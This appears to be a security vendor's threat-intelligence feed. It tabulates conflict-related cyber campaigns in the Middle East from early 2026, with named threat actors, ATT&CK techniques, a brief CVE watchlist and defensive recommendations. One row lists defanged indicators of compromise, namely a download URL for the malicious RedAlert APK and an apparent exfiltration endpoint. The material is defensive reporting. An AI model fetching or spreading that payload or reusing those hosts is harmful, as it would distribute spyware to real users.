Cyber Espionage Campaign / Spear-Phishing Intrusion | No IoCs reported | A targeted cyber-espionage campaign against government officials using social-engineering lures such as password-protected archives disguised as official documents and fake online forms to deliver newly observed malware families. The intrusion chain uses DLL sideloading through legitimate applications, PowerShell execution, registry persistence, and encrypted command-and-control communications. The malware supports remote command execution, file transfer, and system control. Analysts also noted indicators suggesting automated or AI-assisted malware development techniques within the tooling used in the campaign. | SPLITDROP; TWINTASK; TWINTALK; GHOSTFORM | Iraq | Dust Specter (suspected state-linked) | Government | T1566 – Phishing; T1204 – User Execution; T1059.001 – PowerShell Execution; T1574 – DLL Sideloading; T1105 – Ingress Tool Transfer; T1071 – Web Protocol C2; T1027 – Obfuscation | High | Implement application allow-listing to prevent unauthorized DLL sideloading; block password-protected archives from untrusted senders; enable PowerShell script block logging and monitor registry persistence locations; inspect outbound HTTPS traffic for anomalous URI patterns or unusual authentication headers; maintain regular patching and endpoint monitoring; conduct user awareness training to reduce phishing risk. |
Cyber Espionage & Infrastructure Targeting / Reconnaissance Activity | No IoCs reported | Threat intelligence reporting indicates an increase in cyber activity targeting critical infrastructure sectors, including manufacturing and transportation. The activity appears to focus on early-stage reconnaissance and network positioning, with attackers attempting to identify vulnerable systems and establish initial access that could later support espionage, disruption, or destructive operations. Observed techniques include default credential abuse, valid account exploitation, brute-force attempts, and network scanning to map target environments and identify exploitable services. | Not specified | Middle East region; Global organizations with regional exposure | MuddyWater; OilRig (APT34); APT33; UNC1549 | Manufacturing, Transportation, Energy, Government, Finance, Aerospace, Aviation, Telecommunications | T1110 – Brute Force; T1078 – Valid Accounts; T1046 – Network Service Discovery; T1595 – Active Scanning | High | Reduce external attack surface by eliminating default credentials and restricting remote access services; enforce multi-factor authentication for privileged accounts; apply network segmentation and monitor lateral movement; prioritize patching of exposed vulnerabilities and monitor systems that cannot be patched; deploy continuous monitoring and anomaly detection for industrial and enterprise networks; leverage threat intelligence to detect reconnaissance and pre-positioning activity early. |
Cyber Espionage / IoT Surveillance Targeting | CVE-2017-7921; CVE-2021-36260; CVE-2023-6895; CVE-2025-34067; CVE-2021-33044 | Security researchers observed targeting of internet-exposed IP cameras across several Middle East countries, likely to support reconnaissance and situational monitoring during a period of heightened regional tensions. The activity involves attempts to exploit known vulnerabilities in surveillance devices manufactured by Hikvision and Dahua, potentially enabling unauthorized access to video feeds. Such access may provide attackers with visual intelligence and operational awareness, demonstrating how compromised IoT devices can be leveraged to support broader cyber or operational objectives. | Compromised IP cameras (Hikvision, Dahua) | Middle East region (including UAE, Qatar, Bahrain, Kuwait, Cyprus, Lebanon, Israel) | Not attributed | Government, Infrastructure, Surveillance systems | T1595 – Active Scanning; T1190 – Exploit Public-Facing Application; T1046 – Network Service Discovery; T1071 – Application Layer Protocol | High | Remove direct internet exposure for surveillance cameras; place devices behind VPN or zero-trust gateways; enforce strong unique credentials and disable default passwords; apply firmware updates and security patches; segment camera networks from corporate and operational systems; monitor logs for repeated authentication failures or abnormal outbound connections; replace unsupported or end-of-life devices. |
Mar 3, 2026
Campaign | IoC | Campaign Scope | Malware/ Tools | Targeted Country | Threat Actor | Sector | MITRE ATT&CK Techniques | Threat Severity | Recommendation |
|---|---|---|---|---|---|---|---|---|---|
Hacktivism / Coordinated Cyber Activity | No IoCs reported. | Increased hacktivist activity has been observed amid ongoing geopolitical tensions, with multiple groups conducting cyber operations such as website defacements, distributed denial-of-service (DDoS) attacks, and limited data disclosures. Organizations perceived as linked to the wider conflict have been targeted. While the immediate operational impact has remained limited, the growing frequency of these incidents suggests potential for further escalation. | Not specified | Middle East region | Not attributed | Multiple sectors | T1499 – Endpoint/Service Disruption (DDoS); T1491 – Defacement; T1190 – Exploit Public-Facing Application; T1566 – Phishing | Medium | Increase monitoring of public-facing applications and services; deploy DDoS mitigation and web application firewall (WAF) protections; regularly patch externally exposed systems and applications; enforce strong authentication and access controls; monitor website integrity for unauthorized changes; maintain updated incident response procedures and conduct user awareness training against phishing and social engineering. |
Hybrid Conflict-Related Cyber Activity / Multi-Actor Operations | No IoCs reported. | Ongoing geopolitical tensions have led to an increase in hybrid cyber activity combining cyber intrusions, information manipulation, and opportunistic cybercrime. Observed activity includes phishing campaigns, credential theft, DDoS attacks, website defacements, and data theft operations carried out by a mix of state-linked actors, hacktivist groups, and financially motivated cybercriminals. Analysts note that the broader conflict environment is being leveraged by multiple actors to conduct disruptive cyber operations and opportunistic attacks across digital infrastructure. | RedAlert APK (mobile spyware referenced in related activity) | Middle East region | Multiple threat actors | Government, Military, Finance, IT | T1566 – Phishing; T1486 – Data Theft/Impact; T1490 – Inhibit System Recovery; T1562 – Impair Defenses; T1190 – Exploit Public-Facing Application | Medium | Strengthen monitoring for credential theft and phishing activity; implement robust DDoS mitigation and web application protections; enforce multi-factor authentication across critical systems; apply network segmentation to reduce lateral movement; conduct regular security audits and vulnerability management; enhance incident response preparedness and threat intelligence sharing to detect emerging hybrid cyber threats. |
Critical Infrastructure Disruption / Physical–Digital Impact | No IoCs reported | Reports indicate physical attacks targeting data center infrastructure in the Gulf region, leading to temporary disruption of cloud services relied upon by organizations across multiple sectors. The incident highlights the interdependency between physical infrastructure and digital services, where disruptions to data center facilities can impact availability of cloud platforms, enterprise applications, and online services. The situation demonstrates how kinetic events can have downstream digital and operational effects on cloud-dependent organizations. | Not specified | Gulf region (UAE, Bahrain) | Not attributed | IT, Cloud Services | T1499 – Endpoint/Service Disruption; T1485 – Data Destruction (service disruption impact); T1490 – Inhibit System Recovery | High | Review business continuity and disaster recovery plans for cloud service outages; implement geographically distributed infrastructure and failover mechanisms; enhance monitoring and alerting for service disruptions; maintain redundancy for critical workloads; conduct risk assessments covering both cyber and physical infrastructure dependencies; ensure incident response procedures address large-scale service availability incidents. |
Cyber Risk Advisory / Heightened Threat Environment | No IoCs reported | Security researchers issued a “Shields Up” advisory highlighting increased cyber risk associated with an ongoing geopolitical conflict. The advisory emphasizes that organizations should anticipate potential disruptive cyber activity linked to the evolving situation. While no specific malware, campaigns, or threat actors were identified, the warning reflects a heightened threat environment where cyber operations may accompany broader geopolitical developments. Organizations are advised to increase vigilance, strengthen monitoring, and proactively prepare for potential cyber incidents. | Not specified | Not specified | Not specified | Cross-sector | N/A | Medium | Review and strengthen cybersecurity posture by enforcing multi-factor authentication, prioritizing patching of critical vulnerabilities, and increasing logging and monitoring across networks and endpoints. Validate incident response and disaster recovery plans, ensure reliable offline backups, reduce external attack surface, and maintain awareness of emerging threats through threat intelligence monitoring. |
Cyber Threat Escalation / Multi-Actor Cyber Operations | No IoCs reported | Intelligence reporting highlights increased cyber activity associated with ongoing regional instability, including disruptive cyber operations targeting digital and physical infrastructure. Observed activity includes DDoS attacks, data exfiltration attempts, phishing campaigns, and potential destructive operations affecting cloud infrastructure and critical services. Multiple threat clusters appear to be operating concurrently, using varied techniques to disrupt services and gather intelligence during a period of heightened geopolitical tension. The evolving situation indicates a sustained risk of cyber disruption across infrastructure and enterprise networks globally. | Not specified | Global / Multiple regions | Multiple threat clusters | Energy, Finance, Government, Critical Infrastructure | T1566 – Phishing; T1567 – Data Exfiltration; T1190 – Exploit Public-Facing Application; T1499 – Service Disruption (DDoS); T1485 – Data Destruction | High | Strengthen cyber resilience by reviewing incident response and business continuity plans; enforce multi-factor authentication and strict access controls; apply network segmentation to protect critical systems; maintain secure offline backups; enhance monitoring and anomaly detection across cloud and enterprise environments; prioritize patching of exposed vulnerabilities and leverage threat intelligence feeds to detect emerging threats. |
State Cyber Operations / Strategic Cyber Warfare Activity | Public statements indicate that cyber operations are increasingly integrated with broader military strategies, highlighting the role of offensive cyber capabilities alongside traditional military actions. While specific technical details or targets were not disclosed, the development reflects the growing role of cyber operations as a strategic component of modern conflict, potentially involving disruption of systems, intelligence gathering, or defense impairment activities. The announcement signals a shift toward greater transparency regarding the operational importance of cyber capabilities in national security contexts. | Not specified | Not specified | State-linked actors | Government, Military | T1562.001 – Impair Defenses; T1005 – Data from Local System | Medium | Strengthen cyber resilience across critical systems through network segmentation and endpoint protection; deploy intrusion detection and prevention systems (IDS/IPS); enhance continuous monitoring and threat intelligence sharing; conduct regular security assessments and threat hunting exercises; integrate physical and cyber security planning to address hybrid threat scenarios. | |
Conflict-Related Cyber Activity Monitoring | No IoCs reported | Security researchers are monitoring cyber activity associated with an ongoing regional conflict. While large-scale cyber impacts have not yet been observed, minor incidents such as website defacements and small-scale distributed denial-of-service (DDoS) attacks have occurred. Analysts expect continued cyber espionage, disruptive operations, and potential hack-and-leak campaigns as the situation evolves. Opportunistic actors are also exploiting the situation for phishing and social-engineering campaigns. The activity currently appears regionally focused but may affect organizations indirectly through supply chains, partners, or exposed public-facing systems. | Not specified | Middle East (regional impact) | MuddyWater (suspected activity referenced) | Cross-sector | T1566 – Phishing; T1190 – Exploit Public-Facing Application | Medium | Strengthen security hygiene by enforcing multi-factor authentication and applying timely security patches. Increase monitoring for abnormal activity and protect public-facing assets with web application firewalls and DDoS mitigation. Conduct third-party risk assessments, particularly for suppliers or partners operating in affected regions. Provide employee awareness training on phishing and social-engineering attempts that may reference ongoing geopolitical events. |
Threat Landscape Advisory / Increased Cyber Activity | No IoCs reported | Security researchers report an escalation in cyber activity associated with actors linked to Iran, including phishing campaigns, hacktivist operations, and financially motivated cybercrime. The activity reflects a broadening operational scope targeting multiple sectors and organizations globally. While specific tools, malware, or technical indicators were not detailed, analysts warn of a potential increase in disruptive or destructive cyber operations as geopolitical tensions continue. The advisory highlights the need for heightened vigilance and proactive defensive measures across enterprise environments. | Not specified | Not specified | Not specified | Cross Sector | T1566 – Phishing | Medium | Strengthen phishing defenses through email filtering, user awareness training, and multi-factor authentication. Increase monitoring for suspicious network behavior and unauthorized access attempts. Ensure timely patching of vulnerabilities, implement network segmentation to limit lateral movement, and maintain robust logging and alerting to support rapid incident detection and response. Organizations should review and test incident response procedures to ensure readiness for potential cyber incidents. |
Conflict-Driven Cyber Operations / Hacktivist Activity | No IoCs reported | A coordinated military campaign triggered a significant escalation in cyber activity across multiple regions. The situation involved a combination of state-aligned actors, hacktivist collectives, and cybercriminal groups conducting disruptive cyber operations. Observed activity includes phishing campaigns distributing a malicious mobile application masquerading as a legitimate alert app, distributed denial-of-service (DDoS) attacks, infrastructure compromises, and threats targeting organizations and individuals. Analysts also observed coordination among hacktivist groups through centralized channels, highlighting a broader mobilization of cyber actors responding to geopolitical events. | RedAlert (malicious mobile application) | Iran, Israel, Jordan, UAE, Saudi Arabia, Bahrain, Canada, United States | Handala Hack, Cyber Islamic Resistance, NoName057(16), Russian Legion, Tarnished Scorpius | Energy, Finance, Government, Defense, Payment, Industrial | T1566 – Phishing; T1598 – Phishing to Deliver Malware; T1190 – Exploit Public-Facing Application; T1041 – Exfiltration Over C2 Channel | High | Strengthen defenses against phishing and mobile malware by educating users to avoid installing applications from untrusted sources and verifying official app publishers. Maintain fully patched and hardened internet-facing systems and deploy web application firewalls and DDoS protection. Implement strong monitoring for anomalous network activity and potential data exfiltration. Maintain reliable offline backups and review incident response and business continuity plans to ensure resilience against coordinated cyber disruptions. |
Physical Attack Impacting Cloud Infrastructure / Cyber-Physical Risk Event | No IoCs reported | Physical attacks targeting cloud infrastructure resulted in damage to data center facilities in the UAE and Bahrain, leading to service disruptions affecting multiple cloud services across the Middle East. The incident highlights how physical attacks on critical digital infrastructure can cause cascading effects on organizations relying on cloud services, including application outages, degraded performance, and operational disruption. The event underscores the growing convergence of physical and digital threats affecting critical technology infrastructure. | Not specified | UAE, Bahrain | Not specified | IT, Cloud Services | T1485 – Data Destruction; T1490 – Inhibit System Recovery | High | Organizations relying on cloud services should review disaster recovery and business continuity plans to ensure rapid failover to alternative regions or providers. Implement monitoring and alerting for service disruptions, maintain redundant infrastructure where possible, and ensure backups are securely stored across geographically distributed locations. Data center operators should strengthen physical security controls, including perimeter monitoring, surveillance, and access management, while regularly assessing resilience against cyber-physical threat scenarios. |
Conflict-Driven Cyber Activity / Retaliatory Cyber Campaign | No IoCs reported | Following coordinated military operations on February 28, 2026, analysts reported the emergence of a retaliatory cyber campaign associated with the broader conflict. The activity is described as multi-vector and rapidly expanding, indicating a potential escalation of cyber operations alongside physical hostilities. While specific technical details, malware, or intrusion methods were not disclosed, the situation reflects the increasing integration of cyber operations into modern conflict scenarios and highlights the potential for disruption targeting organizations and infrastructure connected to the affected regions. | Not specified | United States, Israel | Not specified | Cross-sector | N/A | Medium | Organizations should review and strengthen incident response and business continuity plans to prepare for potential disruptions to services and infrastructure. Implement network segmentation, enforce multi-factor authentication, and maintain continuous monitoring of network activity. Prioritize patching of critical systems, enhance threat intelligence monitoring, and collaborate with industry and government partners to remain informed of emerging risks associated with ongoing geopolitical developments. |
Potential Cyber Counteroffensive / Conflict-Driven Threat Activity | No IoCs reported | Security researchers warn of potential cyber counteroffensive operations following a major military campaign. Multiple Iran-linked threat actors are believed to be preparing disruptive cyber activity targeting critical infrastructure and opportunistic organizations. Observed behavior includes reconnaissance, vulnerability exploitation of internet-facing systems, and staging activity that could precede destructive attacks such as wiper malware or ransomware. Analysts also report the potential for increased botnet-driven disruption and distributed denial-of-service (DDoS) activity as part of broader retaliation campaigns aligned with geopolitical tensions. | Not specified | United States, Israel, Global | Altoufan Team, HANDALA, Banished Kitten, CyberAv3ngers, APT34, MuddyWater, APT42, Cotton Sandstorm, APT35, Agrius, Imperial Kitten | Energy, Telecommunications, Government, Critical Infrastructure, Transportation, Logistics | T1566 – Phishing; T1190 – Exploit Public-Facing Application; T1486 – Data Encrypted for Impact; T1490 – Inhibit System Recovery | High | Prioritize patching of vulnerabilities in internet-facing systems and strengthen monitoring for abnormal network activity. Implement strong multi-factor authentication and reduce external attack surface where possible. Prepare for potential DDoS activity by deploying mitigation services and traffic filtering. Conduct proactive threat hunting for indicators linked to known threat actor tactics, ensure reliable offline backups are maintained, and regularly review incident response and business continuity plans to maintain operational resilience. |
Distributed Denial-of-Service (DDoS) Attack Claim | No technical IoCs reported | A threat actor known as 313 Team claimed responsibility for cyberattacks targeting the official websites of the Kuwait Ports Authority and the Ministry of Electricity and Water. According to the claim, the attacks resulted in temporary disruption of the Kuwait Ports Authority website for approximately one hour and a complete shutdown of the Ministry of Electricity and Water website during the attack window. The activity appears to involve disruptive operations against public-facing government services, likely intended to cause service outages and signal operational capability. | Not specified | Kuwait | 313 Team / The Islamic Cyber Resistance | Government, Public Services | T1498 – Network Denial of Service | Medium | Implement or reinforce DDoS mitigation services to protect public-facing infrastructure. Monitor network traffic for abnormal spikes and volumetric anomalies indicative of denial-of-service activity. Enable rate limiting and deploy Web Application Firewall (WAF) protections to filter malicious traffic. Establish and regularly test incident response procedures specifically designed for DDoS scenarios to ensure rapid service restoration. |
Potential Cyber Counteroffensive / Threat Activity Advisory | No IoCs reported | Analysts warn of potential cyber counteroffensive operations following a major geopolitical escalation. Multiple Iran-linked threat actors are expected to increase cyber operations targeting critical infrastructure and opportunistic organizations globally. Historical behavior indicates these groups may shift from espionage to disruptive or destructive attacks, including wiper malware, ransomware-style operations, vulnerability exploitation, and botnet-driven DDoS campaigns. Recent reporting indicates reconnaissance, probing, and staging activities that may precede broader cyber operations. | Not specified | United States, Israel, Global | Altoufan Team, HANDALA, Banished Kitten, CyberAv3ngers, APT34, MuddyWater, APT42, APT35, Agrius | Energy, Telecommunications, Government, Defense, Transportation, Logistics, Water | T1566 – Phishing; T1190 – Exploit Public-Facing Application; T1486 – Data Encrypted for Impact; T1133 – External Remote Services; T1562 – Impair Defenses | High | Prioritize patching vulnerabilities in internet-facing systems and reduce external attack surface. Strengthen monitoring for reconnaissance and anomalous network activity. Implement multi-factor authentication and intrusion detection systems to prevent unauthorized access. Prepare for potential DDoS activity by deploying mitigation services and traffic filtering. Conduct proactive threat hunting and regularly review incident response plans to maintain resilience against disruptive cyber operations. |
Hacktivist Cyber Campaign / Conflict-Driven Cyber Activity | hxxps:www[.]shirideitch[.]com/wp-content/uploads/2022/06/RedAlert[.]apk
hxxps://api[.]ra-backup[.]com/analytics/submit[.]php
hxxps://bit[.]ly/4tWJhQh | Analysts report a surge in cyber activity linked to multiple hacktivist groups aligned with regional geopolitical narratives. Despite domestic internet disruption affecting coordination of some operations, affiliated groups and external proxies continue launching disruptive campaigns including DDoS attacks, phishing campaigns, ransomware incidents, hack-and-leak operations, and claims of infrastructure compromise. Targets reportedly include government institutions, financial services, defense systems, and critical infrastructure across the Middle East and partner nations. The activity remains dynamic, with continued disruptive and opportunistic cyber operations expected. | RedAlert (malicious APK) | Jordan, Kuwait, Saudi Arabia, United Arab Emirates, Bahrain, Turkey, United States, Canada | Handala Hack; Cyber Islamic Resistance; RipperSec; Cyb3rDrag0nzz; Dark Storm Team (DarkStorm/MRHELL112); FAD Team (Fatimiyoun Cyber Team); Evil Markhors; Sylhet Gang (SG); 313 Team (Islamic Cyber Resistance in Iraq); DieNet | Government, Administration, Defense, Finance, Military, Banking, Energy, Health, Industrial | T1566.002 – Spearphishing Link; T1498 – Network Denial of Service; T1486 – Data Encrypted for Impact; T1485 – Data Destruction; T1041 – Exfiltration Over C2 Channel | High | Strengthen monitoring of internet-facing infrastructure and enable real-time alerting for abnormal activity. Immediately patch and harden exposed systems and enforce multi-factor authentication across privileged accounts. Deploy robust DDoS protection and traffic filtering mechanisms to mitigate volumetric attacks. Conduct regular phishing awareness training to reduce social-engineering risk. Maintain secure offline backups of critical data and test restoration procedures regularly. Continuously monitor for unauthorized access, data-leak claims, or suspicious network behavior and ensure incident response and business continuity plans are ready to address potential disruptions. |
Vulnerability Watchlist
Mar 18, 2026
CVE | Product | Severity | Patch Status & Updates | Recommendation |
|---|---|---|---|---|
CVE-2026-0231 | Cortex XDR Broker VM | Medium (5.7) | Affects Cortex XDR Broker VM versions below 30.0.49. Upgrade available to version 30.0.49 or later. | Upgrade Cortex XDR Broker VM to version 30.0.49 or later; Enable automatic updates to ensure timely security patching; Restrict access to the Broker VM to authorized users only; Limit high-privilege account usage and enforce least privilege; Monitor and audit administrative activities and terminal sessions; Apply network access controls to reduce exposure to internal threats |
Mar 17, 2026
CVE | Product | Severity | Patch Status & Updates | Recommendation |
|---|---|---|---|---|
Not specified | AWS Bedrock AgentCore Code Interpreter (Sandbox mode) | Not specified | AWS reproduced the finding, deployed and withdrew an initial fix, and ultimately decided not to address it. Documentation updated to state that complete isolation is only achieved using VPC mode. | Migrate sensitive workloads to VPC; Restrict privileges; Explicitly control DNS resolution |
Schedule a Consultation
Speak to our cybersecurity experts to safeguard
your infrastructure.
